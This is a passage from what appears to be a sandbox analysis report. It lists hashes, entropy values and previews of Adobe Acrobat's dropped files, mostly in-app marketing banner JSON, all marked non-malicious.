                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):295
                                                        Entropy (8bit):5.37377824854105
                                                        Encrypted:false
                                                        SSDEEP:6:YEQXJ2HXD10I3Ej9VoZcg1vRcR0YORoAvJM3g98kUwPeUkwRe9:YvXKXKIUjEZc0vsGMbLUkee9
                                                        MD5:BC1BBF0C476AE0E425EDAAD9FE20F854
                                                        SHA1:FA6C4D5090E21F6D2C531BE9CB1CDD0FABBF1FF5
                                                        SHA-256:81F10EF159B4A5030C098C4335CF8BE49DEAB685276FC4190642485517F08964
                                                        SHA-512:19E3430A4BD11CDF23646409F1096F055E907562BC0EBD9C95CA9C25310299754D4867D42AED3D5DA21053159509A064D61E3FEB39B974C0CC1B76901BFC1091
                                                        Malicious:false
                                                        Preview:{"analyticsData":{"responseGUID":"446bc931-9f38-4518-834b-9a0c418fed16","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1707047754562,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):294
                                                        Entropy (8bit):5.324095024600929
                                                        Encrypted:false
                                                        SSDEEP:6:YEQXJ2HXD10I3Ej9VoZcg1vRcR0YORoAvJfBoTfXpnrPeUkwRe9:YvXKXKIUjEZc0vsGWTfXcUkee9
                                                        MD5:182F24D10C40AD7BC400B00CB3BE763C
                                                        SHA1:C1940CDE1884E2EE96F9A5FD54519629687A8627
                                                        SHA-256:ACF7016F01468822228BF95F56C405E01ED713B9BD3490FA588B03E38F98DACA
                                                        SHA-512:633BC15783714ECC08B3C550D7B9979C7AB7C9889DB2049B96BAD0E94733B90B5EFAC9EC9D16AB485C510730D179B57561E300E77AE5D13AC16AA4E23816D4A3
                                                        Malicious:false
                                                        Preview:{"analyticsData":{"responseGUID":"446bc931-9f38-4518-834b-9a0c418fed16","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1707047754562,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):294
                                                        Entropy (8bit):5.302354519958736
                                                        Encrypted:false
                                                        SSDEEP:6:YEQXJ2HXD10I3Ej9VoZcg1vRcR0YORoAvJfBD2G6UpnrPeUkwRe9:YvXKXKIUjEZc0vsGR22cUkee9
                                                        MD5:602F8B991D4AD207AA279197E3E691BD
                                                        SHA1:8547A872AA1AB07F21EAB2C025B42C9142D7C81E
                                                        SHA-256:CE1ED8DA9256F99B4755797AD79804A108D82311126C4E1EE8E34683D71A23F6
                                                        SHA-512:4EB2410CECDCB3180B0E775149BB3A2297A8CFAB6FC833CE732ADEF48FB0C3F1CACC7242D9E027FEC097AE89106B66BE47BAFC170D3E18E95F5AE783B0BC709B
                                                        Malicious:false
                                                        Preview:{"analyticsData":{"responseGUID":"446bc931-9f38-4518-834b-9a0c418fed16","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1707047754562,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):285
                                                        Entropy (8bit):5.36115418849845
                                                        Encrypted:false
                                                        SSDEEP:6:YEQXJ2HXD10I3Ej9VoZcg1vRcR0YORoAvJfPmwrPeUkwRe9:YvXKXKIUjEZc0vsGH56Ukee9
                                                        MD5:A02A820CD4C68455CCDBB87552988F8E
                                                        SHA1:AD26C273FE49798C8C564FEC9E448903062B1A29
                                                        SHA-256:443A2EAB991DF3985176F725C2084DD4FE59E4DF89D0C57AC7E5AF8FF74634A5
                                                        SHA-512:A4FD5B58A9DD6E846AC79F76A2F7093DC3306736D3E323042D2AF0C59C33C27808E80FBBC15B609F4CC921E0F518AD18C9E6E7A5D15D0F448686901B2FC82E27
                                                        Malicious:false
                                                        Preview:{"analyticsData":{"responseGUID":"446bc931-9f38-4518-834b-9a0c418fed16","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1707047754562,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):1255
                                                        Entropy (8bit):5.706122609633607
                                                        Encrypted:false
                                                        SSDEEP:24:Yv6Xn6EzvJpLgEsv4ce3KnctSrymTBcu14wChluBks8ctq3H+:Yv+xhgnvjRrNTB5OJhABks8c2H+
                                                        MD5:C794BD1696ECE8A756B1097521BD61EA
                                                        SHA1:D85CC8026D888190CAF2E7EBB0A2CD6EC37CEF5E
                                                        SHA-256:443CE2A6B644966484ABEA6AC407307CF53B776A0E082AFB50FF6FCA6D87E56D
                                                        SHA-512:99F134D75BD303750CA1E2AC8CB911C0FF8EF4A3AE828EAE7DA7829CDAD522AE8F33E6C1D14B3EFEA650EC2A7ADCFBB222A3A5453A759C51C0552A4788BAEBB8
                                                        Malicious:false
                                                        Preview:{"analyticsData":{"responseGUID":"446bc931-9f38-4518-834b-9a0c418fed16","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1707047754562,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"65179_200306ActionBlock_0","campaignId":65179,"containerId":"1","controlGroupId":"","treatmentId":"f7fa0e9f-7d25-4321-b719-c501bbb8a162","variationId":"200306"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJGcmVlIDctZGF5IHRyaWFsIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTQiLCJmb250X3N0eWxlIjoiMyJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjE0IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjoiIiwiZGVzY3JpcHRpb24iOiJDb252ZXJ0IGZpbGVzIHRvIGFuZCBmcm9tIFBERiBcbndpdGhvdXQgbGltaXRzLiIsImJhY2tncm91bmRfc3R5bGluZyI6eyJiYWNrZ3JvdW5k
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):1250
                                                        Entropy (8bit):5.714067675000116
                                                        Encrypted:false
                                                        SSDEEP:24:Yv6Xn6EzvlVLgEsy4c19ZrGmTBcu14wCh5rgos8ctq3H+:Yv+tFgnyl9ZrBTB5OJhFgos8c2H+
                                                        MD5:3D876E99C49D66C4B722A0FC3FCE005B
                                                        SHA1:B71221952629B69E1DA88A470B056848967E997E
                                                        SHA-256:13D1BABB4B5396DAE27AA840A5D2694157C172DAD43268A841F53FEDB13DC69C
                                                        SHA-512:03B772A470FCF365476FB2326C36062F4C95D16F041D9C4C84E1A7276F3A7190590E2A764AA11DC43E33D5BAF677F5D70AFC83549DF7DF3B5214C732FDF33A0B
                                                        Malicious:false
                                                        Preview:{"analyticsData":{"responseGUID":"446bc931-9f38-4518-834b-9a0c418fed16","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1707047754562,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Disc_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"65179_200306ActionBlock_1","campaignId":65179,"containerId":"1","controlGroupId":"","treatmentId":"250f56c6-2d66-4fca-8033-eabbd2bc9951","variationId":"200306"},"containerId":1,"containerLabel":"JSON for DC_Reader_Disc_LHP_Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJGcmVlIDctZGF5IHRyaWFsIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTQiLCJmb250X3N0eWxlIjoiMyJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjE0IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjoiIiwiZGVzY3JpcHRpb24iOiJDb252ZXJ0LCBlZGl0IGFuZCBlLXNpZ24gUERGXG4gZm9ybXMgJiBhZ3JlZW1lbnRzLiIsImJhY2tncm91bmRfc3R5bGluZyI6eyJiYWNrZ3JvdW5kX2Nvb
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):292
                                                        Entropy (8bit):5.313444260699317
                                                        Encrypted:false
                                                        SSDEEP:6:YEQXJ2HXD10I3Ej9VoZcg1vRcR0YORoAvJfQ1rPeUkwRe9:YvXKXKIUjEZc0vsGY16Ukee9
                                                        MD5:78134F2756DE61486384101270FCEC9C
                                                        SHA1:190DCDD02D0EE1FD580B4EDF8A5AAA5E684B63E0
                                                        SHA-256:687C5D5F2EBFB2D15F14FA4B2444A7986C8456D7294F08F5831AC942803E7DCD
                                                        SHA-512:131BDCE572930E30E6B160B1A5177F3FB84F03CF2B0A5810AF253EA6AF508BD3A0723ECB1E581D68BDA58C3B6BF70F4C5C08551B5E5BF87869EEB231EC22D952
                                                        Malicious:false
                                                        Preview:{"analyticsData":{"responseGUID":"446bc931-9f38-4518-834b-9a0c418fed16","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1707047754562,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):1230
                                                        Entropy (8bit):5.697477077364428
                                                        Encrypted:false
                                                        SSDEEP:24:Yv6Xn6EzvE2LgEsk4ccVrhmTBcu14wChds8ctq3H+:Yv+sognkMVrYTB5OJhds8c2H+
                                                        MD5:02F05007C81E5B99C1121FC0D34E83C6
                                                        SHA1:F2F0899249C2624633617339ABF555B8B08528BD
                                                        SHA-256:8E03FA745FA33CE83E73F5B798169BDBF7D398D08E10B19087D48052C517F38C
                                                        SHA-512:E541B8198F24CA0F6D6A1E01EF01697D9B74455EE68A13929444505142446E5178FDFF18321BA50736B9DDEE502032BFC8C35289F14E26F8034D4F3C250464C5
                                                        Malicious:false
                                                        Preview:{"analyticsData":{"responseGUID":"446bc931-9f38-4518-834b-9a0c418fed16","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1707047754562,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Edit_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"65179_200306ActionBlock_3","campaignId":65179,"containerId":"1","controlGroupId":"","treatmentId":"07caa165-20a7-4c5f-adf8-061ef3d98af3","variationId":"200306"},"containerId":1,"containerLabel":"JSON for DC_Reader_Edit_LHP_Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJGcmVlIDctZGF5IHRyaWFsIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTQiLCJmb250X3N0eWxlIjoiMyJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjE0IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjoiIiwiZGVzY3JpcHRpb24iOiJFZGl0IHRleHQsIGltYWdlcywgcGFnZXMsIGFuZCBtb3JlLiIsImJhY2tncm91bmRfc3R5bGluZyI6eyJiYWNrZ3JvdW5kX2NvbG9yX2RhcmtfdGhlbWUiO
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):1368
                                                        Entropy (8bit):5.758082654380278
                                                        Encrypted:false
                                                        SSDEEP:24:Yv6Xn6EzvUKLgEGcooZbq0jCaBrwJoZct5uWaHbX3H+:Yv+sEgNoNtlSJEc3uWaHbHH+
                                                        MD5:69DD048C1B730176CE5ACE4CF0198464
                                                        SHA1:3A0C90D58DC795954102B1E9A5099A080F9B484F
                                                        SHA-256:75ED99FA28C5B4EFF9E91D3930D1A2CC59D11CD57D6046EDB65DA38944F178D6
                                                        SHA-512:3F82E15533619B50083EB91A058D7F67FEB1FA3E9CE37F5DD41C8063B2B9FFF1E6B1E9B2804A6404E4410028793E63466598F3D37875D855419C637AD405A853
                                                        Malicious:false
                                                        Preview:{"analyticsData":{"responseGUID":"446bc931-9f38-4518-834b-9a0c418fed16","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1707047754562,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Home_LHP_Trial_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"70654_217714ActionBlock_0","campaignId":70654,"containerId":"1","controlGroupId":"","treatmentId":"692283b7-dc9d-4f79-9ee2-bccf324c2980","variationId":"217714"},"containerId":1,"containerLabel":"JSON for DC_Reader_Home_LHP_Trial_Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJUcnkgQWNyb2JhdCBQcm8ifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNyIsImZvbnRfc3R5bGUiOiIwIn0sImRlc2NyaXB0aW9uX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTEiLCJmb250X3N0eWxlIjoiLTEifSwidGl0bGUiOiJGcmVlIDctZGF5IHRyaWFsIiwiZGVzY3JpcHRpb24iOiJHZXQgdW5saW1pdGVkIGFjY2VzcyB0byBhbGwgUERGIGFuZCBlLXNpZ25pbmcgdG9vbHMuIiwiYmFja2d
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):289
                                                        Entropy (8bit):5.316245579687981
                                                        Encrypted:false
                                                        SSDEEP:6:YEQXJ2HXD10I3Ej9VoZcg1vRcR0YORoAvJfYdPeUkwRe9:YvXKXKIUjEZc0vsGg8Ukee9
                                                        MD5:BB6B628BDA46F5992B842F86F73F122C
                                                        SHA1:3519B2FEED0273719111247F1A60049E400FECCD
                                                        SHA-256:BEF0BF182AAD215A02E5BE2AC797CB62FFB8BD0376DBF4084FDD7AC494F3E394
                                                        SHA-512:D24CAA73935D3B82DE9B1FACA015CF8686C536F2FC967AA2C8A226E647037DEAF0013606A1469F40D33C9C298C112DE383C569EB928A44DA89D0B309A1C59499
                                                        Malicious:false
                                                        Preview:{"analyticsData":{"responseGUID":"446bc931-9f38-4518-834b-9a0c418fed16","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1707047754562,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):1395
                                                        Entropy (8bit):5.783223921415038
                                                        Encrypted:false
                                                        SSDEEP:24:Yv6Xn6Ezv7rLgEGOc93W2JeFmaR7CQzttgBcu141CjrWpHfRzVCV9FJN7:Yv+jHgDv3W2aYQfgB5OUupHrQ9FJJ
                                                        MD5:81ED8E4CC52E26FEF59C5665B83D9C34
                                                        SHA1:8F9547E94A9BCF5532E079ED69178884F795518B
                                                        SHA-256:57AFD104313E360ED8F1E7AE76116FEB7CD87E6E46369C0BF9D8CFFB66B354D8
                                                        SHA-512:4F8E88A732C71F9D5385F0A1773BAD917AFF5D83D7FD452A16B0246DB8876979EF9C7466D0EF67D89111849DC51A5A271FC95E9121A4B66AEEF7B55ED277B066
                                                        Malicious:false
                                                        Preview:{"analyticsData":{"responseGUID":"446bc931-9f38-4518-834b-9a0c418fed16","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1707047754562,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_RHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"57802_176003ActionBlock_0","campaignId":57802,"containerId":"1","controlGroupId":"","treatmentId":"d0374f2d-08b2-49b9-9500-3392758c9e2e","variationId":"176003"},"containerId":1,"containerLabel":"JSON for Reader DC RHP Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJGcmVlIDctRGF5IFRyaWFsIiwiZ29fdXJsIjoiaHR0cHM6Ly9hY3JvYmF0LmFkb2JlLmNvbS9wcm94eS9wcmljaW5nL3VzL2VuL3NpZ24tZnJlZS10cmlhbC5odG1sP3RyYWNraW5naWQ9UEMxUFFMUVQmbXY9aW4tcHJvZHVjdCZtdjI9cmVhZGVyIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTQiLCJmb250X3N0eWxlIjoiMyJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjEyIiwiZm9udF9zdHlsZSI6IjMifSwidGl0
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):291
                                                        Entropy (8bit):5.299681023893199
                                                        Encrypted:false
                                                        SSDEEP:6:YEQXJ2HXD10I3Ej9VoZcg1vRcR0YORoAvJfbPtdPeUkwRe9:YvXKXKIUjEZc0vsGDV8Ukee9
                                                        MD5:BBBC3E3787348716A94C9B30EE365883
                                                        SHA1:9BD87FBE9380BD6A4FC06930AF509B92A4A5AA90
                                                        SHA-256:80F1AF7B5C9F2BCD9FA91702D24AA069F392A28326276748F144AA202843C893
                                                        SHA-512:85C326073B73EF3DEE2C124DF4A2BB705976FAC8A6B9195D20C28374A1F33ACDEA82343058ED89C1DA7B7793BD3AA22E6277C0C8D6E7E5E5FEC83BC64E6E6E58
                                                        Malicious:false
                                                        Preview:{"analyticsData":{"responseGUID":"446bc931-9f38-4518-834b-9a0c418fed16","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1707047754562,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):287
                                                        Entropy (8bit):5.3042429590015265
                                                        Encrypted:false
                                                        SSDEEP:6:YEQXJ2HXD10I3Ej9VoZcg1vRcR0YORoAvJf21rPeUkwRe9:YvXKXKIUjEZc0vsG+16Ukee9
                                                        MD5:8F01C4B883B083426C6605F164F521F6
                                                        SHA1:2EA72487AA972357FE905CC6C7DD91A2F360BD3A
                                                        SHA-256:99C8D0DCFC32F821767B6327D873D10A45A80EC8312044E7B3AE40E5D3B5EDA1
                                                        SHA-512:B94458E0EEEB3077058F1C4D983E800E1EE31B7252EA8FDA8F19B9165F2DBB3FB7477320A89ACDE2D5A7F2973EFF0A1DD58CCA8144600BE4DC1231D2F00BCB97
                                                        Malicious:false
                                                        Preview:{"analyticsData":{"responseGUID":"446bc931-9f38-4518-834b-9a0c418fed16","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1707047754562,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):1250
                                                        Entropy (8bit):5.72452198231645
                                                        Encrypted:false
                                                        SSDEEP:24:Yv6Xn6Ezv5amXayLgEs54c3drNaHmTBcu14wChqx+plVCV9FJN3H+:Yv+dBgn5drpTB5OJhr9Q9FJ9H+
                                                        MD5:09503FC1D3A9DDB8E0EFEB536FBC293F
                                                        SHA1:F143C1EA172DFC94A9088584A8A6097D7E614252
                                                        SHA-256:A19BD6244F700B962D209020ECC02C472842891FFD5F5C9533D3F84D1EDD5670
                                                        SHA-512:7089C091F0505DFFA2B18F718F7E39C642CFB5BA2EA8F4E1A3CF75A6EA5B9CBC24D73ADFDBFE90E271DB433FB9E9F4D70C7A0E7C68389983F0E9FDDAD3767294
                                                        Malicious:false
                                                        Preview:{"analyticsData":{"responseGUID":"446bc931-9f38-4518-834b-9a0c418fed16","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1707047754562,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"65179_200306ActionBlock_2","campaignId":65179,"containerId":"1","controlGroupId":"","treatmentId":"8deb148d-1a64-4e57-9648-e8bf939c598e","variationId":"200306"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJGcmVlIDctZGF5IHRyaWFsIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTQiLCJmb250X3N0eWxlIjoiMyJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjE0IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjoiIiwiZGVzY3JpcHRpb24iOiJTZW5kIGRvY3VtZW50cyAmIGZvcm1zIFxuZm9yIGZhc3QgZS1zaWduaW5nIG9ubGluZS4iLCJiYWNrZ3JvdW5kX3N0eWxpbmciOnsiYmFja2dyb3VuZF9jb
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):286
                                                        Entropy (8bit):5.280974697555753
                                                        Encrypted:false
                                                        SSDEEP:6:YEQXJ2HXD10I3Ej9VoZcg1vRcR0YORoAvJfshHHrPeUkwRe9:YvXKXKIUjEZc0vsGUUUkee9
                                                        MD5:16BCD6ADBE2B5B848BEA25CFC42142AF
                                                        SHA1:41710C9A4F0FB86A6F18DAA0D486205A19F4CC41
                                                        SHA-256:C208840B633D0224B65155F4D896920D248AF65EE4A4549B0B017244CAA84974
                                                        SHA-512:0CD074F81DAE1055FECA22B90D795F687BC49FE1D887D5B836A901078A7DE9756DEB5EA65215A6A51DB45B4D01738D6CDB0BA74205035D6F47044298FB3D9E99
                                                        Malicious:false
                                                        Preview:{"analyticsData":{"responseGUID":"446bc931-9f38-4518-834b-9a0c418fed16","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1707047754562,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):782
                                                        Entropy (8bit):5.375232107781253
                                                        Encrypted:false
                                                        SSDEEP:12:YvXKXKIUjEZc0vsGTq16Ukee1+3CEJ1KXd15kcyKMQo7P70c0WM6ZB/uhWX:Yv6Xn6EzvC168CgEXX5kcIfANh+
                                                        MD5:1EDBEEEC5F7BD99E23F41503EC4E3221
                                                        SHA1:59391A3CE134759A87B4FDC257F4282E67798AC7
                                                        SHA-256:42FBC6E18BD46FB2EAF102FEECF0AFAF5B16EA739DFFE2478B550BC110FDBE81
                                                        SHA-512:53FA63B2B630FE3C6623EC9A221A04C69235C6DAE6CE4952D3F4DBA256AF2A9AE79079A732D87AF8218B9A6D6FC2BF30BAB62D0A7628B1C139B7D46A9DB370DF
                                                        Malicious:false
                                                        Preview:{"analyticsData":{"responseGUID":"446bc931-9f38-4518-834b-9a0c418fed16","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1707047754562,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"Edit_InApp_Aug2020"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"20360_57769ActionBlock_0","campaignId":20360,"containerId":"1","controlGroupId":"","treatmentId":"3c07988a-9c54-409d-9d06-53885c9f21ec","variationId":"57769"},"containerId":1,"containerLabel":"JSON for switching in-app test","content":{"data":"eyJ1cHNlbGxleHBlcmltZW50Ijp7InRlc3RpZCI6IjEiLCJjb2hvcnQiOiJicm93c2VyIn19","dataType":"application\/json","encodingScheme":true},"endDTS":1735804679000,"startDTS":1706869164598}}}}
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):4
                                                        Entropy (8bit):0.8112781244591328
                                                        Encrypted:false
                                                        SSDEEP:3:e:e
                                                        MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                        SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                        SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                        SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                        Malicious:false
                                                        Preview:....
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):2818
                                                        Entropy (8bit):5.121417486389503
                                                        Encrypted:false
                                                        SSDEEP:24:YG7KUEf/0va0aygKv5DkxTCkMpf78qwhwRFnrjcgj0Sx+RCZ2+P2LST5wMi5M6Ye:YiKFY5yTLUnwhyHxgC155wMi26Y98
                                                        MD5:A6AD9DF37A82C80D453ECD98FB34B2DB
                                                        SHA1:74ECDAF1749BB4E20DC7A4410201B33EDDBE82EB
                                                        SHA-256:157D91BD23DD07B709EDCC7E78A69820CC721A3F6FCCE08329435A13D1ED9507
                                                        SHA-512:978FBB2281683B9FAABC756B9B5D0B56C23784925418623E730171B6369928D486D029190DF7CB82C9945C128B0FE80EFCA95BB922415C70E6259EA99A800309
                                                        Malicious:false
                                                        Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"24a70d540d61b31fa48f1c84e416a7ed","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":1250,"ts":1706869164000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"1ee32adde1788ff371d37e3d0b4a3402","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":1368,"ts":1706869164000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"ffe2af9feb862ee0c9f87d65a003e6c7","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1250,"ts":1706869164000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"3ea68d4c4d4255dff7d2202d66fac1ff","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1255,"ts":1706869164000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"a755a49b1f0b71654db0b83800842441","sid":"DC_Reader_Edit_LHP_Banner"},"mimeType":"file","size":1230,"ts":1706869164000},{"id":"Edit_InApp_Aug2020","info":{"dg":"bbba1261e9003c833a461a0dec49ad69","sid":"Edit_InApp_Aug2020"},"mimeType":"file","size":782,"ts":17
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                        Category:dropped
                                                        Size (bytes):12288
                                                        Entropy (8bit):1.188684153027223
                                                        Encrypted:false
                                                        SSDEEP:48:TGufl2GL7msEHUUUUUUUU7SvR9H9vxFGiDIAEkGVvpn:lNVmswUUUUUUUU7+FGSItz
                                                        MD5:E2A2199CCEFF4C7534BB70766019DF2E
                                                        SHA1:3B6D1E22A60F6824B80B45B17FAEDA4E31300CA1
